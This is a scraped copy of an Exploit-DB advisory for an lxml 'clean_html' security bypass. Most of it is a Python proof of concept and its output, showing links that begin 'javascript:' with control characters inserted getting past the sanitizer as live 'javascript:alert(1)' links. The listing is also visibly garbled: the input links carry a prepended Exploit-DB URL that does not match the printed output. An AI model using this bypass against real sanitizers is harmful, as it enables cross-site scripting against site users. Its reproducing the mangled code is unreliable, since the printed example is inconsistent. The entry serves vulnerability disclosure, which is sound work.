lxml – ‘clean_html’ Security Bypass

• Exploit Database
• 59 阅读

• 作者： Maksim Kochkin
  日期： 2014-04-15
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/39155/

• source: https://www.securityfocus.com/bid/67159/info
  
  lxml is prone to a security-bypass vulnerability.
  
  An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks.
  
  Versions prior to lxml 3.3.5 are vulnerable. 
  
  from lxml.html.clean import clean_html
  
  html = '''\
  <html>
  <body>
  <a href="javascript:alert(0)">
  aaa</a>
  <a href="https://www.exploit-db.com/exploits/39155/javas\x01cript:alert(1)">bbb</a>
  <a href="https://www.exploit-db.com/exploits/39155/javas\x02cript:alert(1)">bbb</a>
  <a href="https://www.exploit-db.com/exploits/39155/javas\x03cript:alert(1)">bbb</a>
  <a href="https://www.exploit-db.com/exploits/39155/javas\x04cript:alert(1)">bbb</a>
  <a href="https://www.exploit-db.com/exploits/39155/javas\x05cript:alert(1)">bbb</a>
  <a href="https://www.exploit-db.com/exploits/39155/javas\x06cript:alert(1)">bbb</a>
  <a href="https://www.exploit-db.com/exploits/39155/javas\x07cript:alert(1)">bbb</a>
  <a href="https://www.exploit-db.com/exploits/39155/javas\x08cript:alert(1)">bbb</a>
  <a href="https://www.exploit-db.com/exploits/39155/javas\x09cript:alert(1)">bbb</a>
  </body>
  </html>'''
  
  print clean_html(html)
  
  
  Output:
  
  <div>
  <body>
  <a href="https://www.exploit-db.com/exploits/39155/">aaa</a>
  <a href="javascript:alert(1)">
  bbb</a>
  <a href="javascript:alert(1)">bbb</a>
  <a href="javascript:alert(1)">bbb</a>
  <a href="javascript:alert(1)">bbb</a>
  <a href="javascript:alert(1)">bbb</a>
  <a href="javascript:alert(1)">bbb</a>
  <a href="javascript:alert(1)">bbb</a>
  <a href="javascript:alert(1)">bbb</a>
  <a href="https://www.exploit-db.com/exploits/39155/">bbb</a>
  </body>
  </div>